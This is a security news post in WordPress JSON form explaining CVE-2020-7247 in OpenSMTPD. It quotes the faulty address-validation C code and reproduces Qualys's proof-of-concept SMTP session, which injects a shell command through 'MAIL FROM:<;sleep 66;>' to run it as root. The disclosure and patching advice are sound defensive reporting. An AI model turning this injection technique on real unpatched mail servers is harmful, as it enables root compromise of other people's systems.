{"id":33106,"date":"2020-01-30T05:56:08","date_gmt":"2020-01-30T05:56:08","guid":{"rendered":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/"},"modified":"2020-01-30T05:56:08","modified_gmt":"2020-01-30T05:56:08","slug":"anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/","title":{"rendered":"Anatomy of OpenBSD&#8217;s OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage"},"content":{"rendered":"<div><img decoding=\"async\" src=\"https:\/\/regmedia.co.uk\/2016\/10\/31\/shutterstock_hex.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<p><strong class=\"trailer\">Code dive<\/strong> The OpenBSD project&#8217;s OpenSMTPD can be potentially hijacked by a maliciously crafted incoming email.<\/p>\n<p>Infosec biz Qualys discovered and this week disclosed CVE-2020-7247, a root privilege-escalation and remote code execution flaw in OpenSMTPD. It can be exploited locally by a normal user to execute shell commands as root, if using the daemon&#8217;s default configuration, or locally and remotely if the daemon is using its &#8220;uncommented&#8221; default configuration, in which it listens on all interfaces and accepts external mail. Getting root access means it&#8217;s game over: the machine is now yours.<\/p>\n<p>This bug is bad news for anyone running a public-facing, external-mail-accepting OpenSMTPD deployment. Check for security updates to close the hole, <a target=\"_blank\" rel=\"nofollow noopener noreferrer\" href=\"https:\/\/ftp.openbsd.org\/pub\/OpenBSD\/patches\/6.6\/common\/019_smtpd_exec.patch.sig\">apply this patch<\/a>, or disable the daemon. 
The version shipping with OpenBSD 6.6, the latest available, and Debian testing, aka Bullseye, are vulnerable to attack; other releases may be as well. The bug dates back to May 2018.<\/p>\n<h3 class=\"crosshead\"><span>How it went wrong<\/span><\/h3>\n<p>After it receives an email, OpenSMTPD invokes a mail delivery agent to place the incoming message in the recipient&#8217;s inbox on the system. The delivery agent is invoked by OpenSMTPD executing a shell command, which includes the sender&#8217;s address as a command-line parameter. The sender&#8217;s address was supplied by whichever email client earlier connected to OpenSMTPD to send the message.<\/p>\n<p>Passing this address straight to the shell as a parameter is dangerous because hackers can exploit this to inject extra commands to be executed. To avoid this, OpenSMTPD has a string called <code>MAILADDR_ALLOWED<\/code> that defines the non-alpha-numeric characters allowed in a valid address. In addition, the string <code>MAILADDR_ESCAPE<\/code> contains characters that are converted to a colon character to neutralize any special characters that attempt to inject extra commands or parameters.<\/p>\n<p>Thus, an address is valid if it contains only alpha-numeric characters, full-stops, and anything else in <code>MAILADDR_ALLOWED<\/code>. And anything that&#8217;s also in <code>MAILADDR_ESCAPE<\/code> gets converted to a colon. Thus, whatever sender address is supplied by an email client, it can&#8217;t smuggle in extra commands.<\/p>\n<p>Unfortunately, OpenSMTPD&#8217;s sender address validation code, <code>smtp_mailaddr()<\/code>, accidentally jumps the gun and approves dangerous sender addresses that can inject arbitrary commands into delivery agent invocations. An email address has two parts, the local part and the domain part. For <code>corrections@theregister.co.uk<\/code>, corrections is the local part, and theregister.co.uk is the domain part. 
If the sender&#8217;s address has an invalid local part, and an empty domain part, <code>smtp_mailaddr()<\/code> tries to helpfully add a default domain to the address, and then just OKs the string for use on the command line, ignoring the fact the local part is invalid.<\/p>\n<p>And so, if you place invalid special characters in the local part that inject commands into the command line that&#8217;s supposed to invoke the delivery agent, it&#8217;ll all sail through when it&#8217;s not supposed to.<\/p>\n<p>Here&#8217;s the C code at the heart of the security blunder \u2013 <code>smtp_mailaddr()<\/code> should return the value 1 for a valid address and 0 for an invalid address when checking the address in the string pointed to by <code>maddr<\/code>:<\/p>\n<pre class=\"wrap_text\">\n2189 static int\n2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,\n2191 const char *domain)\n2192 {\n....\n2218 if (!valid_localpart(maddr-&gt;user) ||\n2219 !valid_domainpart(maddr-&gt;domain)) {\n....\n2229 if (maddr-&gt;domain[0] == '\\0') {\n2230 (void)strlcpy(maddr-&gt;domain, domain,\n2231 sizeof(maddr-&gt;domain));\n2232 return (1);\n2233 }\n2234 return (0);\n2235 }\n2236\n2237 return (1);\n2238 }\n<\/pre>\n<p>&#8220;If the local part of an address is invalid (line 2218) and if its domain name is empty (line 2229), then smtp_mailaddr() adds the default domain automatically (line 2230) and returns 1 (line 2232), although it should return 0 because the local part of the address is invalid (for example, because it contains invalid characters),&#8221; the Qualys team explained <a target=\"_blank\" rel=\"nofollow noopener noreferrer\" href=\"https:\/\/www.qualys.com\/2020\/01\/28\/cve-2020-7247\/lpe-rce-opensmtpd.txt\">in its summary<\/a>.<\/p>\n<p>&#8220;As a result, an attacker can pass dangerous characters that are not in MAILADDR_ALLOWED and not in MAILADDR_ESCAPE (&#8216;;&#8217; and &#8216; &#8216; in particular) to the shell that executes the 
[mail delivery agent] command.&#8221;<\/p>\n<h3 class=\"crosshead\"><span>Exploitation is trivial<\/span><\/h3>\n<p>To exploit this on your own deployment, connect to your local OpenSMTPD server using Netcat. The following interaction, provided by Qualys as a proof of concept, is just what your email client would go through with the server behind the scenes, though in this case, we&#8217;ll abuse the sender address field. Run Netcat with:<\/p>\n<pre class=\"wrap_text\">\n$ nc 127.0.0.1 25\n<\/pre>\n<p>And the daemon will introduce itself:<\/p>\n<pre class=\"wrap_text\">\n220 obsd66.example.org ESMTP OpenSMTPD\n<\/pre>\n<p>Reply by saying hello to the software:<\/p>\n<pre class=\"wrap_text\">\nHELO professor.falken\n<\/pre>\n<p>It acknowledges you:<\/p>\n<pre class=\"wrap_text\">\n250 obsd66.example.org Hello professor.falken [127.0.0.1], pleased to meet you\n<\/pre>\n<p>Here comes the magic. Inject the command <code>sleep 66<\/code> to make the software pause for 66 seconds, using ; to escape from the delivery agent invocation:<\/p>\n<pre class=\"wrap_text\">\nMAIL FROM:&lt;;sleep 66;&gt;\n<\/pre>\n<p>And that&#8217;s it. The agent invocation command passed to the shell by OpenSMTPD will look something like <code>\/usr\/libexec\/mail.local -f ;sleep 66;<\/code> followed by the rest of the command, which will probably fail as it&#8217;s malformed having been cut in half by the <code>;...;<\/code> injection sequence.<\/p>\n<p>All we care about is the first semicolon ending the <code>mail.local<\/code> invocation prematurely so that our slipped-in <code>sleep 66<\/code> runs, and the second semicolon walling off the rest of the invocation command from affecting our injected command.<\/p>\n<p>With that sent, the server replies:<\/p>\n<pre class=\"wrap_text\">\n250 2.0.0 Ok\n<\/pre>\n<p>Great, it&#8217;s accepted. 
Play out the rest of the message delivery, such as setting the recipient and message contents:<\/p>\n<pre class=\"wrap_text\">\nRCPT TO:&lt;root&gt;\n250 2.1.5 Destination address valid: Recipient ok\nDATA\n354 Enter mail, end with \".\" on a line by itself\nHow about a nice game of chess?\n.\n250 2.0.0 e6330998 Message accepted for delivery\nQUIT\n221 2.0.0 Bye\n<\/pre>\n<p>And with that, the agent command will be run, including our injected sleep.<\/p>\n<p>Interestingly, Qualys said the vulnerability was thought to be much more limited when it was first found: achieving non-trivial command execution is difficult due to various restrictions in place. However, the team were inspired by the 1988 Morris worm&#8217;s abuse of the DEBUG vulnerability in Sendmail to achieve full remote-code execution.<\/p>\n<p>&#8220;Exploitation of the vulnerability had some limitations in terms of local part length (max 64 characters is allowed) and characters to be escaped (\u201c$\u201d, \u201c|\u201d),&#8221; said Animesh Jain, Qualys vulnerability signatures product manager.<\/p>\n<p>&#8220;Qualys researchers were able to overcome these limitations using a technique from the Morris Worm (one of the first computer worms distributed via the Internet, and the first to gain significant mainstream media attention) by executing the body of the mail as a shell script in Sendmail.&#8221;<\/p>\n<p>Admins are advised to update their software and installations as soon as possible. 
\u00ae<\/p>\n<p>READ MORE <a href=\"https:\/\/go.theregister.co.uk\/feed\/www.theregister.co.uk\/2020\/01\/30\/openbsd_mail_bug\/\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Function accidentally returns OK instead of no-way Code dive\u00a0 The OpenBSD project&#8217;s OpenSMTPD can be potentially hijacked by a maliciously crafted incoming email.\u2026 READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":33107,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[63],"tags":[],"class_list":["post-33106","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-the-register"],"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/33106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=33106"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/33106\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/33107"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=33106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=33106"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=33106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}